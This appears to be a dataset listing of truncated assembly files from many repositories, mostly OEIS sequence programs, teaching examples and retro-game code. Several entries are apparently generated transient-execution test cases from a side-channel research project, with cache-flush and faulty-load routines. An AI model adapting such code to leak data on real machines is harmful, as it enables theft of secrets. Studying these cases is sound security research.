; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27026.1 include listing.inc INCLUDELIB MSVCRTD INCLUDELIB OLDNAMES msvcjmc SEGMENT __7B7A869E_ctype@h DB 01H __457DD326_basetsd@h DB 01H __4384A2D9_corecrt_memcpy_s@h DB 01H __4E51A221_corecrt_wstring@h DB 01H __2140C079_string@h DB 01H __1887E5...
oeis/285/A285389.asm
neoneye/loda-programs
11
120822
<filename>oeis/285/A285389.asm ; A285389: Denominator of Sum_{k=0..n^2-1} (-1)^k*sqrt(Pi)/(Gamma(1/2-k)*Gamma(1+k))/n. ; Submitted by <NAME> ; 1,32,32768,268435456,70368744177664,295147905179352825856,19807040628566084398385987584,10633823966279326983230456482242756608,365375409332725729550921208179070754913983135744,5...
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_21829_138.asm
ljhsiun2/medusa
9
120823
<filename>Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0xca_notsx.log_21829_138.asm<gh_stars>1-10 .global s_prepare_buffers s_prepare_buffers: push %r11 push %r13 push %r8 push %rbx push %rcx push %rdi push %rsi lea addresses_D_ht+0x204a, %rsi lea addresses_normal_ht+0xf7da, %rdi clflush (%rdi) xor $10461, %r11 mov $...
mips/example20-str.asm
ping58972/Computer-Organization-Architecture
0
120824
<filename>mips/example20-str.asm ## strlen.asm ## ## Count the characters in a string ## ## Registers: ## $8 -- count ## $9 -- pointer to the char ## $10 -- the char (in low order byte) .text .globl main # Initialize main: ori $8,$0,0 # count = 0 lui $9,0x1001 ...
programs/oeis/110/A110550.asm
jmorken/loda
1
120825
; A110550: Periodic {1,3,2,4,4,2,3,1}. ; 1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4,4,2,3,1,1,3,2,4...
programs/oeis/174/A174737.asm
karttu/loda
0
120826
<reponame>karttu/loda ; A174737: a(n) = a(n-1) - a(n-2), with a(0)=2, a(1)=-1. ; 2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2,1,3,2,-1,-3,-2 mov $1,2 mov $2,1 lpb $0,1 sub $0,1 add $2,...
Web/asm/examples/Big Font (LCD).asm
visrealm/vrcpu
102
120827
; =============================================== ; Big Font Demo ; ----------------------------------------------- ; This demo uses the character LCD ; It generates a set of custom characters which ; are combined to form a custom double-row font ; The font data is stored in the data region of ; memory. ; -------------...
Transynther/x86/_processed/NONE/_zr_/i9-9900K_12_0xca.log_21829_1065.asm
ljhsiun2/medusa
9
120828
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r9 push %rax push %rcx push %rdi push %rdx push %rsi lea addresses_WT_ht+0x117da, %rsi lea addresses_normal_ht+0x9a9a, %rdi nop nop nop and $40014, %r12 mov $75, %rcx rep movsw nop nop nop nop nop dec %rdx lea addresses_D_ht+0x1149a, %rdx clflush (%...
oeis/102/A102781.asm
neoneye/loda-programs
11
120829
; A102781: Number of positive even numbers less than the n-th prime. ; Submitted by <NAME>(w4) ; 0,1,2,3,5,6,8,9,11,14,15,18,20,21,23,26,29,30,33,35,36,39,41,44,48,50,51,53,54,56,63,65,68,69,74,75,78,81,83,86,89,90,95,96,98,99,105,111,113,114,116,119,120,125,128,131,134,135,138,140,141,146,153,155,156,158,165,168,173,1...
programs/oeis/102/A102680.asm
karttu/loda
0
120830
; A102680: Number of digits >= 7 in the decimal representations of all integers from 0 to n. ; 0,0,0,0,0,0,0,1,2,3,3,3,3,3,3,3,3,4,5,6,6,6,6,6,6,6,6,7,8,9,9,9,9,9,9,9,9,10,11,12,12,12,12,12,12,12,12,13,14,15,15,15,15,15,15,15,15,16,17,18,18,18,18,18,18,18,18,19,20,21,22,23,24,25,26,27,28,30,32,34,35,36,37,38,39,40,41,4...
6e03/6e03.asm
sqph/td-micl
0
120831
; 6e03.asm global main section .bss bufferSave RESB 1 ; mémoire tampon stdin/out descrFichier1 RESD 1 ; descripteur fichier 1 descrFichier2 RESD 1 ; descripteur fichier 2 section .rodata nomFichier1 DB `brol1`, 0 nomFichier2 DB `brol2`, 0 msgErreur DB `impossible d'ouvrir l...
lib/io.asm
hxlnt/w2
1
120832
<filename>lib/io.asm<gh_stars>1-10 ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; I/O subroutines GAMEPAD_1 = $4016 GAMEPAD_2 = $4017 GAMEPAD_A = %10000000 GAMEPAD_B = %01000000 GAMEPAD_DOWN = %00000100 GAMEPAD_LEFT = %00000010 GAMEPAD_RIGHT = %00000001 GAMEPAD_SELECT = %00100000 GAMEPAD_STA...
mulflotante.asm
dannyvc95/asm-algorithms
0
120833
section .data ln1: db "Primer valor = ", 00h ln2: db 25h, 6ch, 66h, 00h ln3: db "Segundo valor = ", 00h ln4: db "Resultado = ", 25h, 6ch, 66h, 0ah, 00h section .text global _start _start: extern scanf extern printf push rbp mov rbp, rsp sub rsp, 16 mov edi, ln1 mov eax, 0 call printf lea rax, ...
data/credits/credits_order.asm
opiter09/ASM-Machina
1
120834
<reponame>opiter09/ASM-Machina CreditsOrder: ; subsequent credits elements will be displayed on separate lines. ; CRED_TEXT, CRED_TEXT_FADE, CRED_TEXT_MON, and CRED_TEXT_FADE_MON are ; commands that are used to go to the next set of credits texts. db CRED_MON, CRED_VERSION, CRED_TEXT_FADE_MON db CRED_DIRECTOR, CRED_T...
Transynther/x86/_processed/US/_st_sm_/i7-8650U_0xd2.log_3807_834.asm
ljhsiun2/medusa
9
120835
.global s_prepare_buffers s_prepare_buffers: push %r10 push %r12 push %r13 push %r15 push %r8 push %rax push %rdi lea addresses_A_ht+0xfd01, %rdi nop nop nop nop nop and $25359, %r8 movl $0x61626364, (%rdi) nop nop nop nop cmp %r15, %r15 lea addresses_UC_ht+0x115b1, %r13 nop nop nop nop and $18296, %r12 movups (%r13), ...
fluidcore/main-autodetect.asm
bushy555/ZX-Spectrum-1-Bit-Routines
59
120836
;fluidcore ;4 channel wavetable player for the zx spectrum beeper ;by utz 03'2016 pon equ #18fe poff equ 0 seta equ #af ;xor a ;org #8060 org origin ;org address is defined externally by compile script init ei ;detect kempston halt in a,(#1f) inc a jr nz,_skip ld (maskKempston),a _skip call detectMOS ...
Assembly/Lower Case Trans.asm
knroy/Competitive-Programming
0
120837
include 'emu8086.inc' print "Enter a Uppercase Letter: " mov ah,1 int 21h sub al,'A'' add al,'a' printn "" print "Lower Case: " mov ah,2 mov dl,al int 21h
src/strlen.asm
vorsitzende/libcj
1
120838
; STRLEN.ASM - Routine to count number of bytes in a C-style string. ; <NAME>, 2019 ; Accepts: ; 1: Pointer to C-string. ; Returns: ; - Unsigned 32bit integer. ; State Changes: ; - None. ; C Definition to take the form of: ; - extern unsigned int strlen (const char*); global _strlen sect...
oeis/295/A295574.asm
neoneye/loda-programs
11
120839
<reponame>neoneye/loda-programs ; A295574: a(n) = Sum_{1 <= j <= n/2, gcd(j,n)=1} j^2. ; Submitted by <NAME> ; 0,1,1,1,5,1,14,10,21,10,55,26,91,35,70,84,204,75,285,140,210,165,506,196,525,286,549,406,1015,340,1240,680,880,680,1190,654,2109,969,1482,1080,2870,966,3311,1650,2010,1771,4324,1544,4214,2050,3400,2756,6201,21...
assembler/tests/t_cfemac/t_cfemac.asm
paulscottrobson/RCA-Cosmac-VIP-III
0
120840
<reponame>paulscottrobson/RCA-Cosmac-VIP-III<filename>assembler/tests/t_cfemac/t_cfemac.asm cpu mcf5470 page 0 proc macro name section name public name name equ * endm endp macro rts endsection endm proc fft16 move.l (a2),d4 move.w (a0),d2 move.w (a1),d7 msacl.w d0.u,d4.u,<<,...
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_1671.asm
ljhsiun2/medusa
9
120842
<reponame>ljhsiun2/medusa .global s_prepare_buffers s_prepare_buffers: push %r8 push %r9 push %rcx push %rdi push %rsi lea addresses_normal_ht+0xc775, %rsi lea addresses_A_ht+0x56d5, %rdi nop nop nop sub %r8, %r8 mov $66, %rcx rep movsw xor %r9, %r9 pop %rsi pop %rdi pop %rcx pop %r9 pop %r8 ret .global s_faulty_l...
Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_21829_143.asm
ljhsiun2/medusa
9
120843
<filename>Transynther/x86/_processed/NONE/_xt_/i7-8650U_0xd2_notsx.log_21829_143.asm .global s_prepare_buffers s_prepare_buffers: push %r10 push %r14 push %r8 push %r9 push %rbp push %rcx push %rdi push %rsi lea addresses_WC_ht+0x9e3d, %rsi nop sub %rcx, %rcx movl $0x61626364, (%rsi) nop nop nop inc %r8 lea addresses_D...
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_21829_280.asm
ljhsiun2/medusa
9
120845
.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r15 push %rbp push %rbx push %rcx push %rdi push %rsi lea addresses_WT_ht+0x8ec8, %r11 nop nop nop nop add %rbp, %rbp mov (%r11), %ebx nop nop nop xor %r11, %r11 lea addresses_A_ht+0x11484, %rsi lea addresses_WT_ht+0x1028, %rdi nop nop nop nop nop s...
programs/oeis/145/A145976.asm
neoneye/loda
22
120846
; A145976: Expansion of 1/(1-x*(1-7*x)). ; 1,1,-6,-13,29,120,-83,-923,-342,6119,8513,-34320,-93911,146329,803706,-220597,-5846539,-4302360,36623413,66739933,-189623958,-656803489,670564217,5268188640,574239121,-36303081359,-40322755206,213798814307,496058100749,-1000533599400,-4472940304643,2530794891157,33841377023658...
libsrc/z80_crt0s/z80/sccz80/dload.asm
jpoikela/z88dk
8
120847
<gh_stars>1-10 SECTION code_crt0_sccz80 PUBLIC dload EXTERN fa ;---------------- ; Load FA from hl ;---------------- dload: ld de,fa ld bc,6 ldir ret
src/intel/tools/tests/gen6/or.asm
SoftReaper/Mesa-Renoir-deb
0
120848
or(8) g29<1>UD g9<4>.xUD 0x00000014UD { align16 1Q }; or(8) g43<1>UD g44<4>UD 1D { align16 1Q }; or(1) g28<1>UD g28<0,1,0>UD g57<0,1,0>UD { align1 1N }; or(8) g10<1>UD g9<8,8,1>UD g8<8,8,1>UD { align1 1Q }; or...
oeis/254/A254620.asm
neoneye/loda-programs
11
120849
<reponame>neoneye/loda-programs ; A254620: a(n) = 9^n*(2*n + 1)!/n!. ; Submitted by <NAME> ; 1,54,4860,612360,99202320,19642059360,4596241890240,1240985310364800,379741504971628800,129871594700297049600,49091462796712284748800,20323865597838885886003200,9145739519027498648701440000,4444829406247364343268899840000 mov ...
programs/oeis/057/A057843.asm
neoneye/loda
22
120851
<reponame>neoneye/loda ; A057843: a(n) = floor(n*tau^2) - 3, where tau = (1+sqrt(5))/2. ; -1,2,4,7,10,12,15,17,20,23,25,28,31,33,36,38,41,44,46,49,51,54,57,59,62,65,67,70,72,75,78,80,83,86,88,91,93,96,99,101,104,106,109,112,114,117,120,122,125,127,130,133,135,138,140,143,146,148,151,154,156,159 mov $2,$0 add $0,1 seq ...